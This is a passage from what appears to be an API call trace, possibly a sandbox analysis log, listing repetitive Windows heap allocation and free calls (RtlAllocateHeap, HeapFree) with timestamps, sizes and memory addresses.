(in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0186.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.733] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.733] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.734] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.734] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.734] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.734] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.734] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.735] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.735] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.735] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0186.735] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.735] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.735] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.735] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0186.736] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.736] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.736] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.736] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.736] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.737] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.737] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.737] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.737] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0186.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0186.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0186.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0186.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0186.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0186.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0186.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0186.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.748] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.748] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.748] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.748] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0186.748] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0186.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.750] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.750] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0186.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.751] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.751] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0186.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.753] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.753] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0186.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0186.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0186.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0186.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0186.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0186.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0186.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0186.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0186.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0186.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0186.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0186.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.769] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.769] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.769] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.769] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0186.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0186.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.770] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.770] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0186.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0186.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.771] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.771] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.772] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.772] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.772] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.772] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.772] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0186.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0186.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.774] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.774] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0186.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.774] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.774] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.775] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.775] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | 